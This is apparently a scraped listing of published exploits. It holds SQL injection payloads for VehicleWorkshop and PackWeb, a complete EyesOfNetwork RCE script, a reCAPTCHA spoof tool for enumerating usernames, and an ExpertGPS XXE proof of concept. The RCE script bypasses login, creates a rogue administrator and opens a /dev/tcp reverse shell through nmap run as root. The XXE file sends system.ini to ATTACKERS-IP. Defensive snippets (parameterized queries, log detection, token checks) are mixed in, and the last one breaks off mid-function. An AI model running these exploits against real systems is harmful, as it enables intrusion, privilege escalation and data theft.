All posts by ISHACK AI BOT
-
VehicleWorkshop 1.0 - 'bookingid' SQL Injection
# Exploit Title: VehicleWorkshop 1.0 - 'bookingid' SQL Injection
# Date: 2020-02-06
# Exploit Author: Mehran Feizi
# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
# Tested on: Windows
# Google Dork: N/A

=========
Vulnerable Page:
=========
/viewtestdrive.php

==========
Vulnerable Source:
==========
Line6:  if(isset($_GET['testid']))
Line8:  $results = mysql_query("DELETE from testdrive where bookingid ='$_GET[testid]'");

Line11: if(isset($_GET['testbid']))
Line13: $results = mysql_query("UPDATE testdrive SET status='Approved' where bookingid ='$_GET[testbid]'");

Line16: if(isset($_GET['testbida']))
Line18: $results = mysql_query("UPDATE testdrive SET status='Rejected' where bookingid ='$_GET[testbida]'");

=========
POC:
=========
http://site.com/viewtestdrive.php?bookingid=[SQL]
-
PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection
# Exploit Title: PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection
# Google Dork: intitle: "PackWeb Formap E-learning"
# Date: 2020-02-07
# Exploit Author: Amel BOUZIANE-LEBLOND
# Vendor Homepage: https://www.ediser.com/
# Software Link: https://www.ediser.com/98517-formation-en-ligne
# Version: v1.0
# Tested on: Linux
# CVE : N/A

# Description:
# The PackWeb Formap E-learning application from EDISER is vulnerable to
# SQL injection via the 'NumCours' parameter on the eleve_cours.php

====================
1. SQLi
====================

http://localhost/eleve_cours.php?NumCours=[SQLI]

The 'NumCours' parameter is vulnerable to SQL injection.

GET parameter 'NumCours' is vulnerable.
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://localhost/eleve_cours.php?NumCours=-9758' OR 6342=6342-- rSaq&static=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
    Payload: http://localhost/eleve_cours.php?NumCours=' AND SLEEP(5)-- rGcs&static=1

    Type: UNION query
    Title: MySQL UNION query (47) - 1 column
    Payload: http://localhost/eleve_cours.php?NumCours=' UNION ALL SELECT CONCAT(0x7176707171,0x58794e58714e52434d7879444262574a506d6f41526e636444674d5a6863667a6943517841654d54,0x717a7a6a71)#&static=1
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
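The string-spliced UPDATE from the VehicleWorkshop source above and the boolean tautology shape in the PackWeb sqlmap output, as an added illustration (Python with an in-memory SQLite table, not either application's PHP): the spliced query approves every row, a bound parameter approves none, and an allowlist check rejects the value before it reaches SQL. Table contents and the identifier format are constructed for this example.

```python
import re
import sqlite3

# Allowlist for booking identifiers; an assumption for this example, not the app's rule.
BOOKING_ID_RE = re.compile(r"^[A-Za-z0-9-]{1,32}$")


def make_db():
    """Constructed in-memory stand-in for the application's testdrive table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE testdrive (bookingid TEXT PRIMARY KEY, status TEXT)")
    conn.executemany(
        "INSERT INTO testdrive VALUES (?, ?)",
        [("B1", "Pending"), ("B2", "Pending"), ("B3", "Approved")],
    )
    conn.commit()
    return conn


def approve_vulnerable(conn, testbid):
    """Mirrors the advisory's Line13: the GET value is spliced straight into the SQL text."""
    conn.execute(f"UPDATE testdrive SET status='Approved' where bookingid ='{testbid}'")
    conn.commit()


def approve_parameterized(conn, testbid):
    """The value travels as a bound parameter, so quotes and OR are just characters."""
    conn.execute("UPDATE testdrive SET status = 'Approved' WHERE bookingid = ?", (testbid,))
    conn.commit()


def approve_hardened(conn, testbid):
    """Defense in depth: reject anything outside the identifier format, then bind."""
    if not BOOKING_ID_RE.match(testbid):
        raise ValueError("bookingid has an unexpected format")
    approve_parameterized(conn, testbid)


def approved_ids(conn):
    rows = conn.execute("SELECT bookingid FROM testdrive WHERE status = 'Approved'")
    return sorted(r[0] for r in rows)


def demo():
    """Run the tautology through all three variants and report what each approved."""
    payload = "B1' OR '1'='1"  # same boolean-tautology shape as the PackWeb sqlmap payload
    vuln = make_db()
    approve_vulnerable(vuln, payload)          # WHERE collapses to ... OR '1'='1'
    bound = make_db()
    approve_parameterized(bound, payload)      # looks for a literal id "B1' OR '1'='1"
    hardened = make_db()
    try:
        approve_hardened(hardened, payload)
        rejected = False
    except ValueError:
        rejected = True
    return approved_ids(vuln), approved_ids(bound), rejected
```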
-
EyesOfNetwork 5.3 - Remote Code Execution
# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution
# Date: 2020-02-01
# Exploit Author: Clément Billac
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3
# CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656

#!/bin/env python3
# coding: utf8
#
#
# CVE-2020-8654 - Discovery module allows to run arbitrary OS commands
# We were able to run the 'id' command with the following payload in the target field : ';id #'.
#
# CVE-2020-8655 - LPE via nmap NSE script
# As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
# nmap version 6.40 is used and doesn't have the -c and -e options.
#
# CVE-2020-8656 - SQLi in API in getApiKey function on 'username' field
# PoC: /eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '
# Auth bypass: /eonapi/getApiKey?&username=' union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8 or '&password=h4knet

# Python imports
import sys, requests, json, os, argparse, socket
from bs4 import BeautifulSoup

# Text colors
txt_yellow = "\033[01;33m"
txt_blue = "\033[01;34m"
txt_red = "\033[01;31m"
txt_green = "\033[01;32m"
txt_bold = "\033[01;01m"
txt_reset = "\033[00m"
txt_info = txt_blue + "[*] " + txt_reset
txt_success = txt_green + "[+] " + txt_reset
txt_warn = txt_yellow + "[!] " + txt_reset
txt_err = txt_red + "[x] " + txt_reset

# Banner
banner = (txt_bold + """
+-----------------------------------------------------------------------------+
| EyesOfNetwork 5.3 RCE (API v2.4.2)                                          |
| 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m                |
|                                                                             |
| Examples:                                                                   |
|   eonrce.py -h                                                              |
|   eonrce.py http(s)://EyesOfNetwork-URL                                     |
|   eonrce.py https://eon.thinc.local -ip 10.11.0.182 -port 3128              |
|   eonrce.py https://eon.thinc.local -ip 10.11.0.182 -user pentest2020       |
+-----------------------------------------------------------------------------+
""" + txt_reset)

# Arguments Parser
parser = argparse.ArgumentParser("eonrce", formatter_class=argparse.RawDescriptionHelpFormatter, usage=banner)
parser.add_argument("URL", metavar="URL", help="URL of the EyesOfNetwork server")
parser.add_argument("-ip", metavar="IP", help="Local IP to receive reverse shell", default=socket.gethostbyname(socket.gethostname()))
parser.add_argument("-port", metavar="Port", type=int, help="Local port to listen", default=443)
parser.add_argument("-user", metavar="Username", type=str, help="Name of the new user to create", default='h4ker')
parser.add_argument("-password", metavar="Password", type=str, help="Password of the new user", default='net_was_here')
args = parser.parse_args()

# HTTP Requests config
requests.packages.urllib3.disable_warnings()
baseurl = sys.argv[1].strip('/')
url = baseurl
useragent = 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37'

# Admin user creation variables
new_user = args.user
new_pass = args.password

# Executed command
# The following payload performs both the LPE and the reverse shell in a single command.
# It creates a NSE script in /tmp/h4k which executes /bin/sh with a reverse shell and then performs the nmap scan on localhost with the created NSE script.
# Readable PoC: ;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
ip = args.ip
port = str(args.port)
cmd = '%3Becho+%22local+os+%3D+require+%5C%22os%5C%22+hostrule%3Dfunction%28host%29+os.execute%28%5C%22%2Fbin%2Fsh+-i+%3E%26+%2Fdev%2Ftcp%2F' + ip + '%2F' + port + '+0%3E%261%5C%22%29+end+action%3Dfunction%28%29+end%22+%3E+%2Ftmp%2Fh4k%3Bsudo+%2Fusr%2Fbin%2Fnmap+localhost+-p+1337+-script+%2Ftmp%2Fh4k+%23'

# Exploit banner
print (txt_bold,"""+-----------------------------------------------------------------------------+
| EyesOfNetwork 5.3 RCE (API v2.4.2)                                          |
| 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m                |
+-----------------------------------------------------------------------------+
""", txt_reset, sep = '')

# Check if it's a EyesOfNetwork login page.
r = requests.get(baseurl, verify=False, headers={'user-agent':useragent})
if r.status_code == 200 and r.text.find('<title>EyesOfNetwork</title>') != -1 and r.text.find('form action="login.php" method="POST">') != -1:
    print(txt_info, "EyesOfNetwork login page found", sep = '')
else:
    print(txt_err, 'EyesOfNetwork login page not found', sep = '')
    quit()

# Check for accessible EON API
url = baseurl + '/eonapi/getApiKey'
r = requests.get(url, verify=False, headers={'user-agent':useragent})
if r.status_code == 401 and 'api_version' in r.json().keys() and 'http_code' in r.json().keys():
    print(txt_info, 'EyesOfNetwork API page found. API version: ',txt_bold , r.json()['api_version'], txt_reset, sep = '')
else:
    print(txt_warn, 'EyesOfNetwork API page not found', sep = '')
    quit()

# SQL injection with authentication bypass
url = baseurl + '/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet'
r = requests.get(url, verify=False, headers={'user-agent':useragent})
if r.status_code == 200 and 'EONAPI_KEY' in r.json().keys():
    print(txt_success, 'Admin user key obtained: ', txt_bold, r.json()['EONAPI_KEY'], txt_reset, sep = '')
else:
    print(txt_err, 'The host seems patched or unexploitable', sep = '')
    print(txt_warn, 'Did you specified http instead of https in the URL ?', sep = '')
    print(txt_warn, 'You can check manually the SQLi with the following payload: ', txt_bold, "/eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '", txt_reset, sep = '')
    quit()

# Adding new administrator
url = sys.argv[1].strip('/') + '/eonapi/createEonUser?username=admin&apiKey=' + r.json()['EONAPI_KEY']
r = requests.post(url, verify=False, headers={'user-agent':useragent}, json={"user_name":new_user,"user_group":"admins","user_password":new_pass})
if r.status_code == 200 and 'result' in r.json().keys():
    if r.json()['result']['code'] == 0 and 'SUCCESS' in r.json()['result']['description']:
        id = r.json()['result']['description'].split('ID = ', 1)[1].split(']')[0]
        print(txt_success, 'New user ', txt_bold, new_user, txt_reset, ' successfully created. ID:', txt_bold, id, txt_reset, sep = '')
    elif r.json()['result']['code'] == 1:
        if ' already exist.' in r.json()['result']['description']:
            print(txt_warn, 'The user ', txt_bold, new_user, txt_reset, ' already exists', sep = '')
        else:
            print(txt_err, 'An error occured while querying the API. Unexpected description message: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '')
            quit()
    else:
        print(txt_err, 'An error occured while querying the API. Unepected result code. Description: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '')
        quit()
else:
    print(txt_err, 'An error occured while querying the API. Missing result value in JSON response or unexpected HTTP status response', sep = '')
    quit()

# Authentication with our new user
url = baseurl + '/login.php'
auth_data = 'login=' + new_user + '&mdp=' +new_pass
auth_req = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, data=auth_data)
if auth_req.status_code == 200 and 'Set-Cookie' in auth_req.headers:
    print(txt_success, 'Successfully authenticated', sep = '')
else:
    print(txt_err, 'Error while authenticating. We expect to receive Set-Cookie headers uppon successful authentication', sep = '')
    quit()

# Creating Discovery job
url = baseurl + '/lilac/autodiscovery.php'
job_command = 'request=autodiscover&job_name=Internal+discovery&job_description=Internal+EON+discovery+procedure.&nmap_binary=%2Fusr%2Fbin%2Fnmap&default_template=&target%5B2%5D=' + cmd
r = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, cookies=auth_req.cookies, data=job_command)
if r.status_code == 200 and r.text.find('Starting...') != -1:
    job_id = str(BeautifulSoup(r.content, "html.parser").find(id="completemsg")).split('?id=', 1)[1].split('&rev')[0]
    print(txt_success, 'Discovery job successfully created with ID: ', txt_bold, job_id, txt_reset, sep = '')
else:
    print(txt_err, 'Error while creating the discovery job', sep = '')
    quit()

# Launching listener
print(txt_info, 'Spawning netcat listener:', txt_bold)
nc_command = '/usr/bin/nc -lnvp' + port + ' -s ' + ip
os.system(nc_command)
print(txt_reset)

# Removing job
url = baseurl + '/lilac/autodiscovery.php?id=' + job_id + '&delete=1'
r = requests.get(url, verify=False, headers={'user-agent':useragent}, cookies=auth_req.cookies)
if r.status_code == 200 and r.text.find('Removed Job') != -1:
    print(txt_info, 'Job ', job_id, ' removed', sep = '')
else:
    print(txt_err, 'Error while removing the job', sep = '')
    quit()
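An added detection example, not part of the exploit or of EyesOfNetwork: a scan over Apache access-log lines for the two HTTP-visible shapes above, SQL syntax in getApiKey's `username` (CVE-2020-8656) and POSTs to the Lilac autodiscovery endpoint (CVE-2020-8654), whose injected target field lives in the request body and therefore only shows up as the endpoint hit. The log lines are constructed; the second one carries the advisory's time-based PoC.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-log lines (not from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [07/Feb/2020:10:00:01 +0000] "GET /eonapi/getApiKey?username=bob&password=secret HTTP/1.1" 401 88 "-" "curl/7.64.0"
10.0.0.9 - - [07/Feb/2020:10:00:07 +0000] "GET /eonapi/getApiKey?username=%27%20union%20select%20sleep(3),0,0,0,0,0,0,0%20or%20%27 HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Feb/2020:10:00:20 +0000] "POST /lilac/autodiscovery.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Enough of the combined-log format to recover client, method, target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A username never legitimately contains these; the PoC needs the quote and UNION/SELECT.
SQLI_RE = re.compile(r"(?i)(?:'|\bunion\b|\bselect\b|\bsleep\s*\(|--|#)")


def analyse_line(line):
    """Return {'ip', 'status', 'findings'} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # parse_qs decodes once; unquote_plus again so double-encoded quotes are still seen.
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    if url.path == "/eonapi/getApiKey":
        for value in params.get("username", []):
            if SQLI_RE.search(unquote_plus(value)):
                findings.append("CVE-2020-8656: SQL metacharacters in getApiKey username")
        if findings and m["status"] == "200":
            # The API answers 401 to a bad login; 200 to a malformed username means the
            # injected SELECT produced a row, i.e. a key was likely handed out.
            findings.append("getApiKey returned 200 to a suspicious username: possible key disclosure")
    elif url.path == "/lilac/autodiscovery.php" and m["method"] == "POST":
        findings.append(
            "CVE-2020-8654: discovery job submitted; review target[] fields for shell "
            "metacharacters (request body is not in the access log)"
        )
    return {"ip": m["ip"], "status": m["status"], "findings": findings}


def scan_log(text):
    """Analyse every line and keep only those with at least one finding."""
    results = []
    for line in text.splitlines():
        r = analyse_line(line)
        if r and r["findings"]:
            results.append(r)
    return results
```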
-
Google Invisible RECAPTCHA 3 - Spoof Bypass
# Exploit Title: Google Invisible RECAPTCHA 3 - Spoof Bypass
# Date: 2020-02-07
# Vendor Homepage: https://developers.google.com/recaptcha/docs/invisible
# Exploit Git Repo: https://github.com/matamorphosis/Browser-Exploits/tree/master/RECAPTCHA_Bypass
# Exploit Author: Matamorphosis
# Tested on: Windows and Ubuntu 19.10
# Category: Web Apps

--------------------------------------------------------------------------------------------
RECAPTCHA Bypass:
--------------------------------------------------------------------------------------------
This tool allows a user to bypass Version 3 of Google's Invisible RECAPTCHA by creating a spoofed web app that leverages the same RECAPTCHA, by providing the victim's site key.

What makes a site vulnerable?
1. They are using Version 3 of Google's Invisible RECAPTCHA
2. They allow the site key to be used on "localhost". However, while currently untested, you could try adding the DNS name of the target you are attacking and resolving it to 127.0.0.1 in your hosts file.

NOTE: Exploit users need to have a functional understanding of both Python and JavaScript to make the necessary changes to run this exploit.

--------------------------------------------------------------------------------------------
PREREQUISITES:
--------------------------------------------------------------------------------------------
The instructions supplied are written for Debian-based Linux distributions. However, this can be set up on any OS with relative ease.

1. Download and install Firefox located at https://www.mozilla.org/en-US/firefox/new/

2. Download Gecko Driver located at https://github.com/mozilla/geckodriver/releases and ensure the binary is in your path. For *nix just copy the file to /usr/bin
```
user@linux:~$ sudo cp geckodriver /usr/bin/geckodriver
```

3. To use this exploit, you need to install python3, pip3 and install the additional requirements that are in the requirements.txt file.
```
user@linux:~$ sudo apt install python3 python3-pip -y
```

4. Now install the prerequisites
```
user@linux:~$ pip3 install -r requirements.txt
```

--------------------------------------------------------------------------------------------
USAGE:
--------------------------------------------------------------------------------------------
1. Obtain the site key from the target web application. There should be JavaScript that looks like the following - use the inspect element function to view it. There are two locations you can grab the site key from:
```
<script src="https://www.google.com/recaptcha/api.js?render=<SITE-KEY-HERE>"></script>
<script>
grecaptcha.ready(function() {
  grecaptcha.execute('<SITE-KEY-HERE>', {action:'validate_captcha'})
  .then(function(token) {
    // add token value to form
    document.getElementById('g-recaptcha-response').value = token;
  });
});
</script>
```

2. Open the index.html file and paste the Site Key into the appropriate locations.

3. This next part is where it gets a little tricky. You need to replicate the form you are attacking and change a few things. Firstly, in the body of the index.html file, ensure you are using the appropriate method "GET" or "POST" and you are submitting it to the correct destination.
```
<body>
  <form id="form_id" method="<METHOD GOES HERE>" action="<VICTIM FORM SUBMISSION LINK>">
    <input type="hidden" id="g-recaptcha-response" name="captcha">
    <input id="accName" type="text" name="accountName" value="">
    <input id="uName" type="text" name="username" value="">
    <input type="submit" value="Submit">
  </form>
</body>
```

*For steps 4-6, example code has been provided already, but ensure it matches the site you are targeting. It may be easier to strip it out and follow 4-6 if you are having a difficult time getting it working.*

4. Next you will need to add the following lines to the body of the JavaScript already inside of the <script> tags in the head of the html, after the last line.
```
var url_string = window.location.href;
var url = new URL(url_string);
```

5. After this you need to add the following lines **for each** visible <input> tag in the form you are attacking. This code will automatically take what parameters are provided to the page and set the input elements accordingly.
```
var paramValue1 = url.searchParams.get("accountName");
var account = document.getElementById("accName");
account.value = paramValue1;
```

6. Lastly, add the following lines after you have added JavaScript for each of the <input> tags:
```
var frm = document.getElementById("form_id");
frm.submit();
```

7. Now you need to edit the enumerate.py file to suit your needs. First ensure you change the function to suit the parameters required by your index.html file. In the below example I am trying to enumerate usernames, for an accountname that is the same every time. Note: You must use "localhost" or a DNS name; using "127.0.0.1" or another IP address will probably not work.
```
accountName = 'testAccount'

def attempt(user):
    driver = webdriver.Firefox()
    driver.get(f'http://localhost:8000?accountName={accountName}&username={user}')
```

8. Every time the above function is called, a new Firefox window will be opened, and the link will be called. *If you wish to try and get this working in a headless mode and you succeed, kindly contribute your changes to this repository.* This will allow for the JavaScript to be executed to get the needed CAPTCHA, which will automatically be forwarded on to the destination. After this, create a threaded for loop to suit your needs that iterates through a list and calls the above function for each attempt:
```
for user in ['user1', 'user2', 'user3']:
    thread = threading.Thread(target=attempt, args=(user,))
    thread.start()
```

9. You are now ready to run the exploit. In one terminal session start the web server. This will run on localhost on TCP port 8000. You can change these settings by editing the http_serve.py file:
```
user@linux:~$ python3 http_serve.py
```

10. In another terminal session, run the enumerate.py script, and watch it run!
```
user@linux:~$ python3 enumerate.py
```

--------------------------------------------------------------------------------------------
FILES:
--------------------------------------------------------------------------------------------

---- http_serve.py ----
--------------------------------------------------------------------------------------------
#!/usr/bin/python3
import http.server
import socketserver

PORT = 8000

Handler = http.server.SimpleHTTPRequestHandler

httpd = socketserver.TCPServer(("localhost", PORT), Handler)
print("serving at port", PORT)
httpd.serve_forever()

--------------------------------------------------------------------------------------------
---- enumerate.py ----
--------------------------------------------------------------------------------------------
#!/usr/bin/python3
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import threading

accountName = 'foobar'

def attempt(user):
    driver = webdriver.Firefox()
    driver.get(f'http://localhost:8000?accountName={accountName}&username={user}')

for user in ['user1', 'user2', 'user3']:
    thread = threading.Thread(target=attempt, args=(user,))
    thread.start()

--------------------------------------------------------------------------------------------
---- index.html ----
--------------------------------------------------------------------------------------------
<!DOCTYPE html>
<head>
  <script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/releases/TYDIjJAqCk6g335bFk3AjlC3/recaptcha__en.js"></script>
  <script src="https://www.google.com/recaptcha/api.js?render=<SITE_KEY_GOES_HERE>"></script>
  <script>
    grecaptcha.ready(function() {
      // do request for recaptcha token
      // response is promise with passed token
      grecaptcha.execute('<SITE_KEY_GOES_HERE>', {action:'validate_captcha'})
      .then(function(token) {
        // add token value to form
        document.getElementById('g-recaptcha-response').value = token;
        var url_string = window.location.href;
        var url = new URL(url_string);
        var paramValue1 = url.searchParams.get("accountName");
        var account = document.getElementById("accName");
        account.value = paramValue1;
        var paramValue2 = url.searchParams.get("username");
        var uname = document.getElementById("uName");
        uname.value = paramValue2;
        var frm = document.getElementById("form_id");
        frm.submit();
      });
    });
  </script>
</head>
<body>
  <form id="form_id" method="<METHOD>" action="<VICTIM FORM SUBMISSION LINK>">
    <input type="hidden" id="g-recaptcha-response" name="captcha">
    <input id="accName" type="text" name="accountName" value="">
    <input id="uName" type="text" name="username" value="">
    <input type="submit" value="Submit">
  </form>
</body>
</html>
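An added defensive counterpart, not code from the tool's repository: the server-side check that makes the spoofed localhost page useless, because Google's siteverify response reports the hostname the token was minted on, together with the action, score and issue time. The field names are those of the reCAPTCHA v3 siteverify response; the allowed hostname, action string, score threshold and token lifetime are this example's assumptions, and the two responses are constructed.

```python
import json
from datetime import datetime, timedelta, timezone

# Policy for one protected form. Assumptions for this example: a real deployment
# uses its own hostname(s) and the action its page passes to grecaptcha.execute().
ALLOWED_HOSTNAMES = {"app.example.com"}
EXPECTED_ACTION = "validate_captcha"
MIN_SCORE = 0.5
MAX_TOKEN_AGE = timedelta(minutes=2)


def check_siteverify(body, now):
    """Validate one siteverify JSON response; returns (accepted, reason).

    The spoofed page in the advisory runs under localhost with the victim's site
    key. Google still issues a token, but siteverify names the host that generated
    it, so pinning `hostname` rejects the spoof even before the key's allowed-domain
    list is tightened. Pinning `action` stops tokens minted by another form."""
    try:
        r = json.loads(body)
    except json.JSONDecodeError:
        return False, "unparseable siteverify body"
    if r.get("success") is not True:
        return False, "success=false: " + ",".join(r.get("error-codes", []))
    if r.get("hostname") not in ALLOWED_HOSTNAMES:
        return False, f"token minted on unexpected host {r.get('hostname')!r}"
    if r.get("action") != EXPECTED_ACTION:
        return False, f"unexpected action {r.get('action')!r}"
    try:
        score = float(r["score"])
    except (KeyError, TypeError, ValueError):
        return False, "missing or malformed score"
    if score < MIN_SCORE:
        return False, f"score {score} below threshold {MIN_SCORE}"
    try:
        issued = datetime.strptime(r["challenge_ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    except (KeyError, TypeError, ValueError):
        return False, "missing or malformed challenge_ts"
    if now - issued > MAX_TOKEN_AGE:
        return False, "token too old"
    return True, "ok"


# Constructed siteverify responses (same shape as Google's; values invented).
LEGIT_RESPONSE = json.dumps({
    "success": True, "score": 0.9, "action": "validate_captcha",
    "challenge_ts": "2020-02-07T10:00:00Z", "hostname": "app.example.com",
})
SPOOFED_RESPONSE = json.dumps({
    "success": True, "score": 0.9, "action": "validate_captcha",
    "challenge_ts": "2020-02-07T10:00:00Z", "hostname": "localhost",
})
NOW = datetime(2020, 2, 7, 10, 1, tzinfo=timezone.utc)
STALE_NOW = NOW + timedelta(hours=1)
```

The complementary fix is configuration rather than code: removing localhost from the site key's allowed domains in the reCAPTCHA admin console, which the advisory lists as the second precondition.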
-
ExpertGPS 6.38 - XML External Entity Injection
[+] Exploit Title: ExpertGPS 6.38 - XML External Entity Injection
[+] Date: 2019-12-07
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: https://www.topografix.com/
[+] Software Link: http://download.expertgps.com/SetupExpertGPS.exe
[+] Disclosed at: 7FEB2020
[+] Version: 6.38
[+] Tested on: Windows 10
[+] CVE: N/A

==================
Background:
==================
ExpertGPS 6.38 is GPS software, distributed by TopoGrafix, that is designed to sync with commercial off-the-shelf GPS devices (Garmin, Magellan, etc.) and organize GPS waypoint data. One of the main file formats for saving GPS data is the .gpx format, which is based on XML.

==================
Vulnerability:
==================
By having a user import a crafted .gpx file (an XML-based GPS data file), it is possible to execute an XXE injection which retrieves local files and exfiltrates them to a remote attacker.

1.) Open ExpertGPS.exe
2.) Select File -> Import Data from Other Programs...
3.) Select the crafted route.gpx file (with a listener open on ATTACKERS-IP) and click "Open".

==================
Proof of Concept:
==================
a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd)

b.) Hosted "payload.dtd"

<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">

c.) Exploited "route.xml"

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/payload.dtd">
%sp;
%param1;
%exfil;
]>
<gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1" creator="ExpertGPS 6.38 using Garmin Colorado 400t" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wptx1="http://www.garmin.com/xmlschemas/WaypointExtension/v1" xmlns:gpxx="http://www.garmin.com/xmlschemas/GpxExtensions/v3" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd http://www.topografix.com/GPX/gpx_overlay/0/3 http://www.topografix.com/GPX/gpx_overlay/0/3/gpx_overlay.xsd http://www.topografix.com/GPX/gpx_modified/0/1 http://www.topografix.com/GPX/gpx_modified/0/1/gpx_modified.xsd http://www.topografix.com/GPX/Private/TopoGrafix/0/4 http://www.topografix.com/GPX/Private/TopoGrafix/0/4/topografix.xsd http://www.garmin.com/xmlschemas/WaypointExtension/v1 http://www8.garmin.com/xmlschemas/WaypointExtensionv1.xsd http://www.garmin.com/xmlschemas/GpxExtensions/v3 http://www.garmin.com/xmlschemas/GpxExtensionsv3.xsd">
  <metadata>
    <bounds minlat="38.89767500" minlon="-77.03654700" maxlat="38.89767500" maxlon="-77.03654700"/>
    <extensions>
      <time xmlns="http://www.topografix.com/GPX/gpx_modified/0/1">2019-12-08T03:35:44.731Z</time>
      <active_point xmlns="http://www.topografix.com/GPX/Private/TopoGrafix/0/4" lat="38.89767500" lon="-77.03654700">
      </active_point>
    </extensions>
  </metadata>
  <wpt lat="38.89767500" lon="-77.03654700">
    <time>2019-12-08T03:35:44.732Z</time>
    <name>1600PennsylvaniaAvenuenWashingt</name>
    <cmt>1600 Pennsylvania Avenue Washington</cmt>
    <desc>1600 Pennsylvania Avenue Washington, DC 20500</desc>
    <sym>City (Small)</sym>
    <type>Address</type>
    <extensions>
      <label xmlns="http://www.topografix.com/GPX/gpx_overlay/0/3">
        <label_text>1600 Pennsylvania Avenue Washington, DC 20500</label_text>
      </label>
      <gpxx:WaypointExtension>
        <gpxx:Address>
          <gpxx:StreetAddress>1600 Pennsylvania Avenue</gpxx:StreetAddress>
          <gpxx:City>Washington</gpxx:City>
          <gpxx:State>DC</gpxx:State>
          <gpxx:Country>United States</gpxx:Country>
          <gpxx:PostalCode>20500</gpxx:PostalCode>
        </gpxx:Address>
      </gpxx:WaypointExtension>
      <wptx1:WaypointExtension>
        <wptx1:Address>
          <wptx1:StreetAddress>1600 Pennsylvania Avenue</wptx1:StreetAddress>
          <wptx1:City>Washington</wptx1:City>
          <wptx1:State>DC</wptx1:State>
          <wptx1:Country>United States</wptx1:Country>
          <wptx1:PostalCode>20500</wptx1:PostalCode>
        </wptx1:Address>
      </wptx1:WaypointExtension>
    </extensions>
  </wpt>
  <extensions>
  </extensions>
</gpx>

==================
Additional Attack Vectors:
==================
There are numerous places in the software that allow for importing/opening a .gpx file. I did not test them all, but I strongly suspect that they all rely upon the same misconfigured XML parser, and are therefore vulnerable to XXE.
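An added defensive counterpart, not from the advisory or from ExpertGPS: a pre-import filter for GPX files that aborts on any DOCTYPE, entity declaration or external entity reference before a full-featured XML parser ever sees the document, since a well-formed GPX file needs none of them. It uses Python's expat bindings, which never fetch external resources on their own; the two GPX samples are constructed from the advisory's waypoint, with the PoC's DTD URL kept as its placeholder.

```python
import xml.parsers.expat


class UnsafeGpx(ValueError):
    """Raised when a GPX document uses DTD features an importer should never need."""


def scan_gpx(data):
    """Parse GPX bytes with expat, refusing DOCTYPE/entity features, and return
    a list of (lat, lon, name) for every <wpt> element."""
    p = xml.parsers.expat.ParserCreate()
    waypoints = []
    state = {"wpt": None, "in_name": False}

    def reject(reason):
        # An exception raised inside an expat handler aborts Parse() and propagates.
        def handler(*_args):
            raise UnsafeGpx(reason)
        return handler

    # The PoC's entire attack surface is the DOCTYPE (parameter entities that pull a
    # remote DTD, which in turn reads a local file); any of these events ends the parse.
    p.StartDoctypeDeclHandler = reject("DOCTYPE not allowed in GPX input")
    p.EntityDeclHandler = reject("entity declaration not allowed in GPX input")
    p.ExternalEntityRefHandler = reject("external entity reference not allowed in GPX input")

    def start(name, attrs):
        if name == "wpt":
            state["wpt"] = {"lat": attrs.get("lat"), "lon": attrs.get("lon"), "name": ""}
        elif name == "name" and state["wpt"] is not None:
            state["in_name"] = True

    def end(name):
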